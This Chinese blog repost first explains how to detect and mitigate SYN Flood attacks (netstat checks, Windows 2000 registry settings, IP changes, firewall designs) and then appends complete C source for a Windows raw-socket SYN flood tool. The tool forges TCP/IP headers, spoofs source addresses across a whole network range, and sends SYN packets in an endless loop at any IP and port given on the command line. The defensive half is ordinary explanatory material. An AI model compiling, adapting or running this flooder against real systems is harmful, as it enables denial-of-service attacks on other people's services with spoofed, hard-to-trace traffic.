美文网首页
SYN Flood攻击的监测与防御初探

SYN Flood攻击的监测与防御初探

作者: 封闭_e657 | 来源:发表于2019-08-21 15:17 被阅读0次

    对于SYN Flood攻击,目前尚没有很好的监测和防御方法,不过如果系统管理员熟悉攻击方法和系统架构,通过一系列的设定,也能从一定程度上降低被攻击系统的负荷,减轻负面的影响。

    一般来说,如果一个系统(或主机)负荷突然升高甚至失去响应,使用Netstat 命令能看到大量SYN_RCVD的半连接(数量>500或占总连接数的10%以上),可以认定,这个系统(或主机)遭到了SYN Flood攻击。

    遭到SYN Flood攻击后,首先要做的是取证,通过Netstat –n –p tcp >resault.txt记录目前所有TCP连接状态是必要的,如果有嗅探器,或者TcpDump之类的工具,记录TCP SYN报文的所有细节也有助于以后追查和防御,需要记录的字段有:源地址、IP首部中的标识、TCP首部中的序列号、TTL值等,这些信息虽然很可能是攻击者伪造的,但是用来分析攻击者的心理状态和攻击程序也不无帮助。特别是TTL值,如果大量的攻击包似乎来自不同的IP但是TTL值却相同,我们往往能推断出攻击者与我们之间的路由器距离,至少也可以通过过滤特定TTL值的报文降低被攻击系统的负荷(在这种情况下TTL值与攻击报文不同的用户就可以恢复正常访问)

    前面曾经提到可以通过缩短SYN Timeout时间和设置SYN Cookie来进行SYN攻击保护,对于Win2000系统,还可以通过修改注册表降低SYN Flood的危害,在注册表中作如下改动:

    首先,打开regedit,找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters

    增加一个SynAttackProtect的键值,类型为REG_DWORD,取值范围是0-2,这个值决定了系统受到SYN攻击时采取的保护措施,包括减少系统SYN+ACK的重试的次数等,默认值是0(没有任何保护措施),推荐设置是2;

    增加一个TcpMaxHalfOpen的键值,类型为REG_DWORD,取值范围是100-0xFFFF,这个值是系统允许同时打开的半连接,默认情况下WIN2K PRO和SERVER是100,ADVANCED SERVER是500,这个值很难确定,取决于服务器TCP负荷的状况和可能受到的攻击强度,具体的值需要经过试验才能决定。

    增加一个TcpMaxHalfOpenRetried的键值,类型为REG_DWORD,取值范围是80-0xFFFF,默认情况下WIN2K PRO和SERVER是80,ADVANCED SERVER是400,这个值决定了在什么情况下系统会打开SYN攻击保护。

    我们来分析一下Win2000的SYN攻击保护机制:正常情况下,Win2K对TCP连接的三次握手有一个常规的设置,包括SYN Timeout时间、SYN-ACK的重试次数和SYN报文从路由器到系统再到Winsock的延时等,这个常规设置是针对系统性能进行优化的(安全和性能往往相互矛盾)所以可以给用户提供方便快捷的服务;一旦服务器受到攻击,SYN半连接的数量超过TcpMaxHalfOpenRetried的设置,系统会认为自己受到了SYN Flood攻击,此时设置在SynAttackProtect键值中的选项开始作用,SYN Timeout时间被减短,SYN-ACK的重试次数减少,系统也会自动对缓冲区中的报文进行延时,避免对TCP/IP堆栈造成过大的冲击,力图将攻击危害减到最低;如果攻击强度不断增大,超过了TcpMaxHalfOpen值,此时系统已经不能提供正常的服务了,更重要的是保证系统不会崩溃,所以系统将会丢弃任何超出TcpMaxHalfOpen值范围的SYN报文(应该是使用随机丢包策略),保证系统的稳定性。

    所以,对于需要进行SYN攻击保护的系统,我们可以测试/预测一下访问峰值时期的半连接打开量,以其作为参考设定TcpMaxHalfOpenRetried的值(保留一定的余量),然后再以TcpMaxHalfOpenRetried的1.25倍作为TcpMaxHalfOpen值,这样可以最大限度地发挥WIN2K自身的SYN攻击保护机制。

    通过设置注册表防御SYN Flood攻击,采用的是“挨打”的策略,无论系统如何强大,始终不能光靠挨打支撑下去,除了挨打之外,“退让”也是一种比较有效的方法。

    退让策略是基于SYN Flood攻击代码的一个缺陷,我们重新来分析一下SYN Flood攻击者的流程:SYN Flood程序有两种攻击方式,基于IP的和基于域名的,前者是攻击者自己进行域名解析并将IP地址传递给攻击程序,后者是攻击程序自动进行域名解析,但是它们有一点是相同的,就是一旦攻击开始,将不会再进行域名解析,我们的切入点正是这里:假设一台服务器在受到SYN Flood攻击后迅速更换自己的IP地址,那么攻击者仍在不断攻击的只是一个空的IP地址,并没有任何主机,而防御方只要将DNS解析更改到新的IP地址就能在很短的时间内(取决于DNS的刷新时间)恢复用户通过域名进行的正常访问。为了迷惑攻击者,我们甚至可以放置一台“牺牲”服务器让攻击者满足于攻击的“效果”(由于DNS缓冲的原因,只要攻击者的浏览器不重起,他访问的仍然是原先的IP地址)。

    同样的原因,在众多的负载均衡架构中,基于DNS解析的负载均衡本身就拥有对SYN Flood的免疫力,基于DNS解析的负载均衡能将用户的请求分配到不同IP的服务器主机上,攻击者攻击的永远只是其中一台服务器,虽然说攻击者也能不断去进行DNS请求从而打破这种“退让”策略,但是一来这样增加了攻击者的成本,二来过多的DNS请求可以帮助我们追查攻击者的真正踪迹(DNS请求不同于SYN攻击,是需要返回数据的,所以很难进行IP伪装)。

    对于防火墙来说,防御SYN Flood攻击的方法取决于防火墙工作的基本原理,一般说来,防火墙可以工作在TCP层之上或IP层之下,工作在TCP层之上的防火墙称为网关型防火墙,网关型防火墙与服务器、客户机之间的关系如下所示:

    如上图所示,客户机与服务器之间并没有真正的TCP连接,客户机与服务器之间的所有数据交换都是通过防火墙代理的,外部的DNS解析也同样指向防火墙,所以如果网站被攻击,真正受到攻击的是防火墙,这种防火墙的优点是稳定性好,抗打击能力强,但是因为所有的TCP报文都需要经过防火墙转发,所以效率比较低由于客户机并不直接与服务器建立连接,在TCP连接没有完成时防火墙不会去向后台的服务器建立新的TCP连接,所以攻击者无法越过防火墙直接攻击后台服务器,只要防火墙本身做的足够强壮,这种架构可以抵抗相当强度的SYN Flood攻击。但是由于防火墙实际建立的TCP连接数为用户连接数的两倍(防火墙两端都需要建立TCP连接),同时又代理了所有的来自客户端的TCP请求和数据传送,在系统访问量较大时,防火墙自身的负荷会比较高,所以这种架构并不能适用于大型网站。(我感觉,对于这样的防火墙架构,使用TCP_STATE攻击估计会相当有效:)

    工作在IP层或IP层之下的防火墙(路由型防火墙)工作原理有所不同,它与服务器、客户机的关系如下所示:

    客户机直接与服务器进行TCP连接,防火墙起的是路由器的作用,它截获所有通过的包并进行过滤,通过过滤的包被转发给服务器,外部的DNS解析也直接指向服务器,这种防火墙的优点是效率高,可以适应100Mbps-1Gbps的流量,但是这种防火墙如果配置不当,不仅可以让攻击者越过防火墙直接攻击内部服务器,甚至有可能放大攻击的强度,导致整个系统崩溃。

    在这两种基本模型之外,有一种新的防火墙模型,我个人认为还是比较巧妙的,它集中了两种防火墙的优势,这种防火墙的工作原理如下所示:

    第一阶段,客户机请求与防火墙建立连接:

    第二阶段,防火墙伪装成客户机与后台的服务器建立连接

    第三阶段,之后所有从客户机来的TCP报文防火墙都直接转发给后台的服务器

    这种结构吸取了上两种防火墙的优点,既能完全控制所有的SYN报文,又不需要对所有的TCP数据报文进行代理,是一种两全其美的方法。

    近来,国外和国内的一些防火墙厂商开始研究带宽控制技术,如果能真正做到严格控制、分配带宽,就能很大程度上防御绝大多数的拒绝服务攻击,我们还是拭目以待吧。

    #include"stdafx.h"

    /*

    int _tmain(int argc, _TCHAR* argv[])

    {

    return 0;

    }

    */

    #include<winsock2.h>

    #include<Ws2tcpip.h>

    #include<stdio.h>

    #include<stdlib.h>

    #defineSEQ 0x28376839

    //#define SYN_DEST_IP "192.168.15.250"//被攻击的IP

    //#define SYN_DEST_IP "202.108.22.5"//百度

    #defineSYN_DEST_IP"127.0.0.1"

    #defineFAKE_IP"10.168.150.1"//伪装IP的起始值,本程序的伪装IP覆盖一个B类网段

    #defineSTATUS_FAILED 0xFFFF//错误返回值

    #pragmacomment(lib,"ws2_32.lib")

    typedefstruct_iphdr//定义IP首部

    {

    unsignedcharh_verlen;//4位首部长度,4位IP版本号

    unsignedchartos;//8位服务类型TOS

    unsignedshorttotal_len;//16位总长度(字节)

    unsignedshortident;//16位标识

    unsignedshortfrag_and_flags;//3位标志位

    unsignedcharttl;//8位生存时间 TTL

    unsignedcharproto;//8位协议 (TCP, UDP 或其他)

    unsignedshortchecksum;//16位IP首部校验和

    unsignedintsourceIP;//32位源IP地址

    unsignedintdestIP;//32位目的IP地址

    }IP_HEADER;

    struct//定义TCP伪首部

    {

    unsignedlongsaddr;//源地址

    unsignedlongdaddr;//目的地址

    charmbz;

    charptcl;//协议类型

    unsignedshorttcpl;//TCP长度

    }psd_header;

    typedefstruct_tcphdr//定义TCP首部

    {

    USHORT th_sport;//16位源端口

    USHORT th_dport;//16位目的端口

    unsignedintth_seq;//32位序列号

    unsignedintth_ack;//32位确认号

    unsignedcharth_lenres;//4位首部长度/6位保留字

    unsignedcharth_flag;//6位标志位

    USHORT th_win;//16位窗口大小

    USHORT th_sum;//16位校验和

    USHORT th_urp;//16位紧急数据偏移量

    }TCP_HEADER;

    //CheckSum:计算校验和的子函数

    USHORTchecksum(USHORT *buffer,intsize)

    {

    unsignedlongcksum=0;

    while(size >1) {

    cksum+=*buffer++;

    size -=sizeof(USHORT);

    }

    if(size ) {

    cksum += *(UCHAR*)buffer;

    }

    cksum = (cksum >>16) + (cksum &0xffff);

    cksum += (cksum >>16);

    return(USHORT)(~cksum);

    }

    //  SynFlood主函数

    int_tmain(intargc, _TCHAR* argv[])

    //int main()

    {

    printf("这只是个demo,每秒只能发送10个半连接请求。具体了解请联系shark926@sina.com\n");

    if(argc <3)

    {

    printf("argument not enough!\n");

    printf("usage SYNFlood.exe <distinat ip> <port>\n");

    return0;

    }

    intiDstPort = atoi(argv[2]);

    printf("SYN Flood-> %s:%d\n", argv[1], iDstPort);

    intdatasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost;

    intTimeOut=2000,SendSEQ=0;

    charSendBuf[128]={0};

    charRecvBuf[65535]={0};

    WSADATA wsaData;

    SOCKET SockRaw=(SOCKET)NULL;

    structsockaddr_inDestAddr;

    IP_HEADER ip_header;

    TCP_HEADER tcp_header;

    //初始化SOCK_RAW

    if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){

    fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode);

    ExitProcess(STATUS_FAILED);

    }

    SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);

    if(SockRaw==INVALID_SOCKET){

    fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError());

    ExitProcess(STATUS_FAILED);

    }

    flag=TRUE;

    //设置IP_HDRINCL以自己填充IP首部

    ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(int));

    if(ErrorCode==SOCKET_ERROR)printf("Set IP_HDRINCL Error!\n");

    __try{

    //设置发送超时

    ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));

    if(ErrorCode==SOCKET_ERROR){

    fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError());

    __leave;

    }

    memset(&DestAddr,0,sizeof(DestAddr));

    DestAddr.sin_family=AF_INET;

    //DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);

    DestAddr.sin_addr.s_addr=inet_addr(argv[1]);

    FakeIpNet=inet_addr(FAKE_IP);

    FakeIpHost=ntohl(FakeIpNet);

    //填充IP首部

    ip_header.h_verlen=(4<<4|sizeof(ip_header)/sizeof(unsignedlong));

    //高四位IP版本号,低四位首部长度

    ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));//16位总长度(字节)

    ip_header.ident=1;//16位标识

    ip_header.frag_and_flags=0;//3位标志位

    ip_header.ttl=128;//8位生存时间TTL

    ip_header.proto=IPPROTO_TCP;//8位协议(TCP,UDP…)

    ip_header.checksum=0;//16位IP首部校验和

    ip_header.sourceIP=htonl(FakeIpHost+SendSEQ);//32位源IP地址

    //ip_header.destIP=inet_addr(SYN_DEST_IP);                              //32位目的IP地址

    ip_header.destIP=inet_addr(argv[1]);

    //填充TCP首部

    tcp_header.th_sport=htons(7000);//源端口号

    tcp_header.th_dport=htons(iDstPort);//目的端口号

    tcp_header.th_seq=htonl(SEQ+SendSEQ);//SYN序列号

    tcp_header.th_ack=0;//ACK序列号置为0

    tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0);//TCP长度和保留位

    tcp_header.th_flag=2;//SYN 标志

    tcp_header.th_win=htons(16384);//窗口大小

    tcp_header.th_urp=0;//偏移

    tcp_header.th_sum=0;//校验和

    //填充TCP伪首部(用于计算校验和,并不真正发送)

    psd_header.saddr=ip_header.sourceIP;//源地址

    psd_header.daddr=ip_header.destIP;//目的地址

    psd_header.mbz=0;

    psd_header.ptcl=IPPROTO_TCP;//协议类型

    psd_header.tcpl=htons(sizeof(tcp_header));//TCP首部长度

    while(1) {

    //每发送10,240个报文输出一个标示符

    printf("*\n");

    for(counter=0;counter<10240;counter++){

    Sleep(100);//每秒10个包

    printf(".");

    if(SendSEQ++==65536) SendSEQ=1;//序列号循环

    //更改IP首部

    ip_header.checksum=0;//16位IP首部校验和

    ip_header.sourceIP=htonl(FakeIpHost+SendSEQ);//32位源IP地址

    //更改TCP首部

    tcp_header.th_seq=htonl(SEQ+SendSEQ);//SYN序列号

    tcp_header.th_sum=0;//校验和

    //更改TCP Pseudo Header

    psd_header.saddr=ip_header.sourceIP;                 

    //计算TCP校验和,计算校验和时需要包括TCP pseudo header       

    memcpy(SendBuf,&psd_header,sizeof(psd_header));

    memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));

    tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));

    //计算IP校验和

    memcpy(SendBuf,&ip_header,sizeof(ip_header));

    memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));

    memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4);

    datasize=sizeof(ip_header)+sizeof(tcp_header);

    ip_header.checksum=checksum((USHORT *)SendBuf,datasize);

    //填充发送缓冲区

    memcpy(SendBuf,&ip_header,sizeof(ip_header));

    //发送TCP报文

    ErrorCode=sendto(SockRaw,

    SendBuf,

    datasize,

    0,

    (struct sockaddr*) &DestAddr,

    sizeof(DestAddr));

    if(ErrorCode==SOCKET_ERROR)printf("\nSend Error:%d\n",GetLastError());

    }//End of for

    }//End of While

    }//End of try

    __finally {

    if(SockRaw != INVALID_SOCKET) closesocket(SockRaw);

    WSACleanup();

    }

    return0;

    }

    转载于:https://blog.csdn.net/fanwenbo/article/details/8668679

        有服务器需求请加QQ1911624872咨询

    相关文章

      网友评论

          本文标题:SYN Flood攻击的监测与防御初探

          本文链接:https://www.haomeiwen.com/subject/sktisctx.html